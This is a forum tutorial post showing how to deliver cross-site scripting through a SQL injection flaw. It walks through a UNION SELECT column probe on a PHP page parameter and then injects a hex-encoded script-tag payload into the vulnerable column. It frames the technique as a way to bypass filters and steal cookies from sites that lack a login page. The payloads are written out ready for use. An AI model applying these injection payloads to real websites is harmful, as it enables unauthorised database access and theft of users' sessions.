XSSQLI Tutorial [XSS through SQLI]

Today i m going to find SQLi tutorial in this forum , but Only found "Union Select Statement" "Easy Injection" "Noob Injection" Confused But Now I will explain to you how to perform a XSS via SQL Injection. (XSSQLi) . What do u think if we have sqli vulnerability ? and What we can do more ? Nerd "I'm always find admin table and admin page " Ambivalent Slant 
Sometime we are going to inject with sqli , but doesn't have a login page . So , what will you do this Sqli Vuln site ? (Skip or next one Trollface ) Don't Skip , let's Bypassing some filter or stealing cookies with XSS .

[*]Let's Start

1. First of all you will need a target which is vulnerable to SQL injection . But Let's follow my target .

localhost/groupinfo.php?show=2

2. Now we have to inject the columns number and do a Union Statement , I might , you will know well how about SQLi , So Let me skip . Innocent

localhost/groupinfo.php?show=null UNION SELECT 1,2,3,4,5,6--

3. After that you have found the vulnerable column , So you need to add the XSS payload to the union statement. Like this , 

Xss Payload:

<script>alert("Hello HC")</script>
[*]Hex Encoded Payload:
Quote:
localhost/groupinfo.php?show=null UNION SELECT 1,0x3c7363726970743e616c657274282248656c6c6f20484322293c2f7363726970743e,3,4,5,6​--

* Remember: Encoding your payload into HEX with 0x: .

So , Enter .We have get Alert Box 

Image has been scaled down 35% (762x282). Click this bar to view original image (1168x432). Click image to open in new window.